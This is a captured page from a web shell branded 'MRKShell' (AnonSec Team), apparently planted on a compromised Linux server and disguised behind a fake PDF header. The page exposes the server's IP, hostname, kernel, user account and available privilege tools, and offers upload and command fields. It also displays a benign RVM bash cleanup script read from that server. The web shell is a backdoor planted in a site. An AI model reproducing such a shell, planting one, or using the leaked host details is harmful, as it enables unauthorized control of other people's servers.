...........................................................................................................................................................................................................................................................................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%PDF-1.5 MRK IS HERE %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY MR K IS HERE
MRKShell
Server IP : 65.108.66.160  /  Your IP : 216.73.217.50
Web Server : Apache
System : Linux srv16.asso.com.ar 4.18.0-553.123.1.el8_10.x86_64 #1 SMP Tue May 5 04:00:43 EDT 2026 x86_64
User : alasaweborg ( 1047)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/local/rvm/scripts/functions/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /usr/local/rvm/scripts/functions//cleanup
#!/usr/bin/env bash

# wrapper for smaller output from __rvm_log_command
__rvm_rm_rf()
{
  __rvm_rm_rf_verbose "$@"
}
#
# \command \rm -rf with *some* safeguards in place.
#
__rvm_rm_rf_verbose()
{
  \typeset target
  target="${1%%+(/|.)}"

  #NOTE: RVM Requires extended globbing shell feature turned on.
  if
    [[ -n "${ZSH_VERSION:-}" ]]
  then
    \builtin setopt extendedglob
  elif
    [[ -n "${BASH_VERSION:-}" ]]
  then
    \builtin shopt -s extglob
  else
    rvm_error "What the heck kind of shell are you running here???"
  fi
  case "${target}" in
    (*(/|.)@(|/Applications|/Developer|/Guides|/Information|/Library|/Network|/System|/User|/Users|/Volumes|/backups|/bdsm|/bin|/boot|/cores|/data|/dev|/etc|/home|/lib|/lib64|/mach_kernel|/media|/misc|/mnt|/net|/opt|/private|/proc|/root|/sbin|/selinux|/srv|/sys|/tmp|/usr|/var))
      rvm_debug "__rvm_rm_rf target is not valid - can not remove"
      return 1
      ;;
    (*)
      if
        [[ -z "${target}" ]]
      then
        rvm_debug "__rvm_rm_rf target not given"
        return 1
      elif
        [[ -d "${target}" ]]  # directory
      then
        \command \rm -rf "${target}" ||
        {
          \typeset ret=$?
          rvm_debug "__rvm_rm_rf error removing target dir '${target}'."
          return $ret
        }
      elif
        [[ -f "${target}" || -L "${target}" ]] # file / broken symbolic link
      then
        \command \rm -f "${target}" ||
        {
          \typeset ret=$?
          rvm_debug "__rvm_rm_rf error removing target file/link '${target}'."
          return $ret
        }
      else
        rvm_debug "__rvm_rm_rf already gone: $*"
      fi
      ;;
  esac
  true # for OSX
}

# Cleans up temp folders for a given prefix ($1),
# or the current process id.
__rvm_cleanup_tmp()
{
  if
    [[ -d "${rvm_tmp_path}/" ]]
  then
    case "${rvm_tmp_path%\/}" in
      *tmp)
        __rvm_rm_rf "${rvm_tmp_path}/${1:-$$}*"
        ;;
    esac
  fi
  true # for osx
}

Anon7 - 2022
AnonSec Team